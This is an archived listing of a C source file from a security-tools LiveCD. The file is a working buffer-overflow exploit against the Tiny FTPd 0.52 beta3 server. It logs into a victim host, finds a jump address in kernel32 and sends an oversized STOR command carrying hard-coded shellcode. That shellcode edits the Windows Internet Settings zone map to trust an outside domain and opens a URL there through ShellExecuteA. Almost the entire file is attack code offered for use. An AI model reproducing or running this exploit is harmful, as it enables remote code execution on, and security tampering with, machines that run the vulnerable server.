home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / tftp / tiny / tftpdex.c < prev   
Encoding:
C/C++ Source or Header  |  2005-02-12  |  6.9 KB  |  206 lines
  1. /*=========================================================================
  2. ====
  3.    Tiny FTPd 0.52 beta3 exploit
  4.    The Shadow Penguin Security (http://shadowpenguin.backsection.net)
  5.    Written by UNYUN (shadowpenguin@backsection.net)
  6.   =========================================================================
  7. ====
  8. */
  9.  
  10. #include    <stdio.h>
  11. #include    <string.h>
  12. #include    <windows.h>
  13. #include    <winsock.h>
  14.  
  15. #define     FTP_PORT        21
  16. #define     MAXBUF          2000
  17. #define     MAXPACKETBUF    32000
  18. #define     RETADR          268
  19. #define     JMPESP_1        0xff
  20. #define     JMPESP_2        0xe4
  21. #define     NOP             0x90
  22. #define     KERNEL_NAME     "kernel32.dll"
  23.  
  24. static unsigned char exploit_code[1000]={
  25. 0xEB,0x67,0x5F,0x33,0xC0,0x88,0x47,0x0C,0x88,0x47,0x18,0x88,0x47,0x26,0x88,
  26. 0x47,
  27. 0x34,0x88,0x47,0x43,0x88,0x47,0x51,0x88,0x47,0x56,0x89,0x47,0x57,0x33,0xDB,
  28. 0xB3,
  29. 0xB8,0x03,0xDF,0x88,0x03,0x43,0x88,0x43,0x07,0x88,0x43,0x20,0x57,0xB8,0x50,
  30. 0x77,
  31. 0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xDB,0xB3,0x19,0x03,0xDF,0x53,0x56,0xB8,
  32. 0x28,
  33. 0x6E,0xF7,0xBF,0xFF,0xD0,0x33,0xD2,0xB2,0x5B,0x03,0xD7,0x52,0xBA,0xFF,0xFF,
  34. 0xFF,
  35. 0xFF,0x52,0x33,0xC9,0x51,0x33,0xD2,0xB2,0x63,0x03,0xD7,0x52,0xB1,0x01,0xC1,
  36. 0xE1,
  37. 0x1F,0x80,0xC9,0x03,0x51,0xFF,0xD0,0xEB,0x02,0xEB,0x5B,0x33,0xDB,0xB3,0x27,
  38. 0x03,
  39. 0xDF,0x53,0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x33,0xD2,0xB2,0x5F,0x03,
  40. 0xD7,
  41. 0x52,0x33,0xD2,0xB2,0xB9,0x03,0xD7,0x52,0x33,0xD2,0xB2,0x5B,0x03,0xD7,0x8B,
  42. 0x1A,
  43. 0x53,0xFF,0xD0,0x33,0xDB,0xB3,0x35,0x03,0xDF,0x53,0x56,0xB8,0x28,0x6E,0xF7,
  44. 0xBF,
  45. 0xFF,0xD0,0x33,0xC9,0xB1,0x04,0x51,0x33,0xD2,0xB2,0x57,0x03,0xD7,0x52,0x51,
  46. 0x33,
  47. 0xD2,0x52,0x33,0xD2,0xB2,0x52,0x03,0xD7,0x52,0x33,0xD2,0xB2,0x5F,0x03,0xD7,
  48. 0x8B,
  49. 0x1A,0x53,0xFF,0xD0,0xEB,0x02,0xEB,0x38,0x33,0xDB,0xB3,0x0C,0xFE,0xC3,0x03,
  50. 0xDF,
  51. 0x53,0xB8,0x50,0x77,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xDB,0xB3,0x44,0x03,
  52. 0xDF,
  53. 0x53,0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x33,0xDB,0xB3,0x01,0x53,0x33,
  54. 0xDB,
  55. 0x53,0x53,0x33,0xC9,0xB1,0xC1,0x03,0xCF,0x51,0x53,0x53,0xFF,0xD0,0x90,0xEB,
  56. 0xFD,
  57. 0xE8,0xFD,0xFE,0xFF,0xFF,0x00};
  58.  
  59. #define WORKAREA    \
  60. "advapi32.dll*shell32.dll*RegOpenKeyExA*RegCreateKeyA*"\
  61. "RegSetValueExA*ShellExecuteA*http*000011112222.DEFAULT"\
  62. "\\Software\\Microsoft\\Windows\\CurrentVersion"\
  63. "\\Internet Settings\\ZoneMap\\Domains\\*"
  64.  
  65. #define DOMAIN  "backsection.net"
  66. #define URL     "http://shadowpenguin.backsection.net/ocx/sample.html"
  67.  
  68. unsigned int search_mem(unsigned char *st,unsigned char *ed,
  69.                 unsigned char c1,unsigned char c2)
  70. {
  71.     unsigned char   *p;
  72.     unsigned int    adr;
  73.  
  74.     for (p=st;p<ed;p++)
  75.         if (*p==c1 && *(p+1)==c2){
  76.             adr=(unsigned int)p;
  77.             if ((adr&0xff)==0) continue;
  78.             if (((adr>>8)&0xff)==0) continue;
  79.             if (((adr>>16)&0xff)==0) continue;
  80.             if (((adr>>24)&0xff)==0) continue;
  81.             return(adr);
  82.         }
  83.     return(0);
  84. }
  85.  
  86. main(int argc,char *argv[])
  87. {
  88.     SOCKET               sock;
  89.     SOCKADDR_IN          addr;
  90.     WSADATA              wsa;
  91.     WORD                 wVersionRequested;
  92.     unsigned int         i,kp,ip,p1,p2,p;
  93.     unsigned int         pretadr;
  94.     static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF],*q;
  95.     struct hostent       *hs;
  96.     MEMORY_BASIC_INFORMATION meminfo;
  97.  
  98.     if (argc<3){
  99.         printf("usage: %s VictimHost UserName Password\n",argv[0]);
  100.         exit(1);
  101.     }
  102.     if ((void *)(kp=(unsigned int)LoadLibrary(KERNEL_NAME))==NULL){
  103.         printf("Can not find %s\n",KERNEL_NAME);
  104.         exit(1);
  105.     }
  106.  
  107.     VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION));
  108.     pretadr=0;
  109.     for (i=0;i<meminfo.RegionSize;i++){
  110.         p=kp+i;
  111.         if ( ( p     &0xff)==0
  112.           || ((p>>8 )&0xff)==0
  113.           || ((p>>16)&0xff)==0
  114.           || ((p>>24)&0xff)==0) continue;
  115.         if (*((unsigned char *)p)==JMPESP_1 && *(((unsigned char *)p)+1)==
  116. JMPESP_2) pretadr=p;
  117.     }
  118.     printf("RETADR         : %x\n",pretadr);
  119.     if (pretadr==0){
  120.         printf("Can not find codes which are used by exploit.\n");
  121.         exit(1);
  122.     }
  123.  
  124.     wVersionRequested = MAKEWORD( 2, 0 );
  125.     if (WSAStartup(wVersionRequested , &wsa)!=0){
  126.         printf("Winsock Initialization failed.\n"); return -1;
  127.     }
  128.     if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
  129.         printf("Can not create socket.\n"); return -1;
  130.     }
  131.     addr.sin_family     = AF_INET;
  132.     addr.sin_port       = htons((u_short)FTP_PORT);
  133.     if ((addr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
  134.             if ((hs=gethostbyname(argv[1]))==NULL){
  135.                 printf("Can not resolve specified host.\n"); return -1;
  136.             }
  137.             addr.sin_family = hs->h_addrtype;
  138.             memcpy((void *)&addr.sin_addr.s_addr,hs->h_addr,hs->h_length);
  139.     }
  140.     if (connect(sock,(LPSOCKADDR)&addr,sizeof(addr))==SOCKET_ERROR){
  141.         printf("Can not connect to specified host.\n"); return -1;
  142.     }
  143.     recv(sock,packetbuf,MAXPACKETBUF,0);
  144.     sprintf(packetbuf,"user %s\r\n",argv[2]);
  145.     send(sock,packetbuf,strlen(packetbuf),0);
  146.     recv(sock,packetbuf,MAXPACKETBUF,0);
  147.     sprintf(packetbuf,"pass %s\r\n",argv[3]);
  148.     send(sock,packetbuf,strlen(packetbuf),0);
  149.     recv(sock,packetbuf,MAXPACKETBUF,0);
  150.  
  151.     memset(buf,NOP,MAXBUF); buf[MAXBUF-1]=0;
  152.  
  153.     ip=pretadr;
  154.     buf[RETADR  ]=ip&0xff;
  155.     buf[RETADR+1]=(ip>>8)&0xff;
  156.     buf[RETADR+2]=(ip>>16)&0xff;
  157.     buf[RETADR+3]=(ip>>24)&0xff;
  158.  
  159.     p1=(unsigned int)GetProcAddress((HINSTANCE)kp,"LoadLibraryA");
  160.     p2=(unsigned int)GetProcAddress((HINSTANCE)kp,"GetProcAddress");
  161.  
  162.     printf("LoadLibraryA   : %x\n",p1);
  163.     printf("GetProcAddress : %x\n",p2);
  164.     if ( ( p1     &0xff)==0
  165.       || ((p1>>8 )&0xff)==0
  166.       || ((p1>>16)&0xff)==0
  167.       || ((p1>>24)&0xff)==0
  168.       || ( p2     &0xff)==0
  169.       || ((p2>>8 )&0xff)==0
  170.       || ((p2>>16)&0xff)==0
  171.       || ((p2>>24)&0xff)==0){
  172.         printf("NULL code is included.\n");
  173.         exit(1);
  174.     }
  175.     exploit_code[0x28]=strlen(DOMAIN);
  176.     exploit_code[0x2B]=strlen(URL)+strlen(DOMAIN)+1;
  177.     exploit_code[0xf5]=strlen(DOMAIN)+186;
  178.  
  179.     exploit_code[0x2e]=exploit_code[0xd2]=p1&0xff;
  180.     exploit_code[0x2f]=exploit_code[0xd3]=(p1>>8)&0xff;
  181.     exploit_code[0x30]=exploit_code[0xd4]=(p1>>16)&0xff;
  182.     exploit_code[0x31]=exploit_code[0xd5]=(p1>>24)&0xff;
  183.     exploit_code[0x3f]=exploit_code[0x74]=p2&0xff;
  184.     exploit_code[0x40]=exploit_code[0x75]=(p2>>8)&0xff;
  185.     exploit_code[0x41]=exploit_code[0x76]=(p2>>16)&0xff;
  186.     exploit_code[0x42]=exploit_code[0x77]=(p2>>24)&0xff;
  187.     exploit_code[0x9c]=exploit_code[0xe3]=p2&0xff;
  188.     exploit_code[0x9d]=exploit_code[0xe4]=(p2>>8)&0xff;
  189.     exploit_code[0x9e]=exploit_code[0xe5]=(p2>>16)&0xff;
  190.     exploit_code[0x9f]=exploit_code[0xe6]=(p2>>24)&0xff;
  191.  
  192.     strcat(exploit_code,WORKAREA);
  193.     strcat(exploit_code,DOMAIN);
  194.     strcat(exploit_code,"*");
  195.     strcat(exploit_code,URL);
  196.  
  197.     memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code));
  198.  
  199.     sprintf(packetbuf,"stor %s\r\n",buf);
  200.     send(sock,packetbuf,strlen(packetbuf),0);
  201.     Sleep(3000);
  202.     closesocket(sock);
  203.     printf("Done.\n");
  204.     return FALSE;
  205. }
  206.